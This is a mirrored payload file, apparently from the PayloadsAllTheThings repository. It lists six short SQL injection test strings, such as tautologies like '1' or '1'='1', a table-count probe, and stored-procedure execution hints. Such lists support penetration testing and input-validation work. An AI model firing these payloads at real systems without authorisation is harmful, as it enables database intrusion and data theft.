mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
7 lines
108 B
Text
7 lines
108 B
Text
|
1'1
|
||
|
1 exec sp_ (or exec xp_)
|
||
|
1 and 1=1
|
||
|
1' and 1=(select count(*) from tablenames); --
|
||
|
1 or 1=1
|
||
|
1' or '1'='1
|